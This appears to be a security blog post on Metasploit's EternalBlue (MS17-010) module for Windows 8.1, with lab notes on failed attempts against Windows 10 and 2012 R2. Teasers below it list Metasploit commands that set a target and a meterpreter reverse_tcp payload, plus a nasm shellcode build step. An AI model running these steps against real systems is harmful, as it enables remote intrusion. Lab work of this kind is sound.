MS17-010 Vulnerability - New EternalBlue SMB module for Metasploit - Exploiting Windows 8.1

In its July 2018 update, Metasploit has released a new EternalBlue module named: ms17_010_eternalblue_win8   The short description for this module reads: MS17-010 EternalBlue SMB remote Windows Kernel Pool Corruption for Win8+
The July Metasploit update releases can be found on this link.

Of course, Metasploit already had an EternalBlue module which was called ms17_010_eternalblue, but this older module was compatible only with Windows 7 and Windows 2008 R2 (x64).
On the other hand, the new ms17_010_eternalblue_win8 is listed as being compatible with Windows 8.1, Windows 10 (selected builds) and Windows 2012 R2 (x64).

Before watching my new video on exploiting Windows 8.1 with the new ms17_010_eternalblue_win8 module, you might find useful reviewing my previous posts related to the EternalBlue exploit, which I list below:

1.  MS17-010 Vulnerability - Using EternalBlue exploit module in Metasploit

2. MS17-010 Vulnerability - EternalBlue exploit using a binary payload and python script on Windows 7 and Windows 2008 R2 targets



Also, if you want to test the new EternalBlue module into your own lab, then make sure that you update your Kali Linux installation first. The ms17_010_eternalblue_win8 module will be installed during the Kali update process. If you need help updating your Kali Linux machine, then check the following post: Installing Kali Linux as a VMware Virtual Machine

MS17-010 EternalBlue SMB remote Windows Kernel Pool Corruption for Win8+ Metasploit Module

exploit/windows/smb/ms17_010_eternalblue_win8


MS17-010 Vulnerability - New EternalBlue SMB module for Metasploit - Exploiting Windows 8.1



Note:

 During the last couple of weeks I have tested the ms17_010_eternalblue_win8 module against multiple Windows 10 build versions as well as against Windows 2012 R2. At this stage, I haven't been able to successfully exploit Windows 10 nor Windows 2012 R2, even if the module description said that it should have worked.

So far, I have had the following experience with the various Windows 10 (x64) build versions:
- Win10 Pro             Build 10240           - The target machine crashed
- Win10 Pro             Build 10586.0        - The target machine crashed
- Win10 Enterprise Build 10586.0        - The target machine crashed
- Win10 Pro             Build 10586.164   - The target machine crashed
- Win10 Pro             Build 14393.0        - This exploit doesn't support build 14393 or above

As a workaround, I have tried to lower the GroomAllocations ( numGroomConn ) parameter value, but the Windows 10 target machine kept crashing.

On the other hand, when I attempted to use the module against my Windows 2012 R2 (Build 9600) test machine, the module gave the following error:
 'ascii' codec can't decode byte 0xc5 in position 2: ordinal not in range(128)


I'll update this post when I'm able to use the ms17_010_eternalblue_win8 module against other OSes. 

Comments

Post a comment

Popular Posts

MS17-010 Vulnerability - Using EternalBlue exploit module in Metasploit

Image
Previously we identified the MS17-010 vulnerability by scanning using NMAP and by scanning with a Metasploit auxiliary module.

In the video below we will exploit the MS17-010 vulnerability by using the EternalBlue Metasploit module which comes by default with Metasploit Framework.

Metasploit commands used in this video:
search ms17_010
This command identifies modules containing the "ms17_010" string.
use exploit/windows/smb/ms17_010_eternalblue
This command selects the "exploit/windows/smb/ms17_010_eternalblue" module.
show options
This command displays the options available for the selected module.
set processname lsass.exe
This commands selects the process to inject the payload into.
set rhost <IP_Address>
This command sets the target IP address.
show payloads
This command (when is executed under the module context), shows the payloads compatible with the selected module.
set payload windows/x64/meterpreter/reverse_tcp
This command selects the Meterpreter reverse_tcp paylo…
Read more

Generating shellcode - using msfvenom to generate a binary payload

Image
In this video we generate a binary payload (shellcode) that we will use later on to exploit the EternalBlue Windows OS vulnerability.

The article below is an excellent introduction to how a binary payload works:
https://blog.rapid7.com/2015/03/25/stageless-meterpreter-payloads/

Our payload has 2 parts that will be generated independently, then combined into a single file.

The first component is the Windows x64 kernel shellcode for Eternalblue exploit and the ASM code is downloaded from the following location:
https://gist.github.com/worawit/05105fce9e126ac9c85325f0b05d6501

We will use "nasm" (general-purpose x86 assembler) on Kali Linux, in order to compile the kernel shellcode, by using the command below:

nasm -f bin eternalblue_x64_kshellcode.asm -o sc_x64_kernel.bin

The output for this command (and the first component for our payload) is the "sc_x64_kernel.bin" file.

The second component for our payload, is the part of the code which will create the Meterpreter shell fro…
Read more

MS17-010 Vulnerability - Scanning using Metasploit on KALI Linux

Image
In the video below we will identify computers affected by the MS17-010 vulnerability, by  using a Metasploit auxiliary scanning module.
Check also my other post on detecting the MS17-010 vulnerability by using NMAP.

MS17-010 is a severe SMB Server vulnerability which affected all Windows operating systems and was exploited by WannaCry, Petya and Bad Rabbit Ransomware.
This vulnerability was made public in March 2017 and allowed remote code execution on the victim computer. 
For more information, check the Microsoft Security Bulletin MS17-010:
https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010
https://support.microsoft.com/en-au/help/4013389/title

Metasploit commands used in this video:
search name:ms17_010 
This command lists the Metasploit modules containing the string "ms17_010" in the name. 
Can also simply use: search ms17_010
use auxiliary/scanner/smb/smb_ms17_010
This command selects the module "auxiliary/scanner/smb/smb_ms17_010".
show opti…
Read more